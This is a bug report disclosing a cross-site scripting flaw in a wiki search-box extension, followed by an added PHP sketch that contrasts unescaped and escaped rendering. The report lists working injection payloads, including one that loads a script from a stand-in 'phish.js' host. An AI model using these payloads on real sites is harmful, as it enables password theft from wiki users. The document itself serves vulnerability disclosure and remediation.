Author: conrad.irwin
Description:
As this does no HTML escaping it is possible for editors to embed script tags in the page, with all of the security problems that that entails.
I found this problem on wiktionary and wikipedia, so I am guessing it is a universal problem.
For example...
<inputbox>
type=search
buttonlabel=Hello" onclick="alert('gotcha');return false
searchbuttonlabel=Dig deeper
</inputbox>
<inputbox>
type=search
buttonlabel=Hello" /><!-- Actually this is quite useful...
searchbuttonlabel=Dig deeper--> <br class="
</inputbox>
<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript">document.body.innerHTML="You Smell";</script>
searchbuttonlabel=Oops
</inputbox>
<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript" src="http://www.example.com/phish.js" />
searchbuttonlabel=Now you are really for it
</inputbox>
This could have dire consequences, as it would be trivial to get people's wiki passwords (in the name of the unified login scheme) or other less obvious hacks.
Version: unspecified
Severity: critical
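
The first sample from the report, run through an unescaped and an escaped attribute renderer. This is an added example, not the InputBox extension's code and not part of the original report; the function names and the exact `<input>` markup are assumptions made for illustration.

```php
<?php
// Added example: stand-alone sketch, not the InputBox extension's code.
// parseInputBox(), renderUnsafe(), renderEscaped() and the name="go"
// markup are hypothetical.

/** Parse the key=value lines of an <inputbox> body into an array. */
function parseInputBox(string $body): array {
    $opts = [];
    foreach (preg_split('/\R/', trim($body)) as $line) {
        if (strpos($line, '=') === false) {
            continue; // not an option line
        }
        [$key, $value] = explode('=', $line, 2);
        $opts[strtolower(trim($key))] = trim($value);
    }
    return $opts;
}

/** The pattern the report describes: editor text concatenated into an attribute. */
function renderUnsafe(array $o): string {
    return '<input type="submit" name="go" value="' . ($o['buttonlabel'] ?? '') . '" />';
}

/** Same markup with the value escaped for a double-quoted attribute context. */
function renderEscaped(array $o): string {
    $label = htmlspecialchars($o['buttonlabel'] ?? '', ENT_QUOTES, 'UTF-8');
    return '<input type="submit" name="go" value="' . $label . '" />';
}

// First sample from the report, used verbatim as input.
$body = <<<'WIKI'
type=search
buttonlabel=Hello" onclick="alert('gotcha');return false
searchbuttonlabel=Dig deeper
WIKI;

$opts = parseInputBox($body);

// The double quote ends value= early, so onclick is parsed as a new attribute.
echo renderUnsafe($opts), PHP_EOL;

// The quotes are emitted as &quot; and &#039;, so the whole label stays
// inside value= as inert text.
echo renderEscaped($opts), PHP_EOL;
```

Escaping has to happen at output time for every editor-supplied option (here `buttonlabel` and `searchbuttonlabel`), since each one lands in its own attribute.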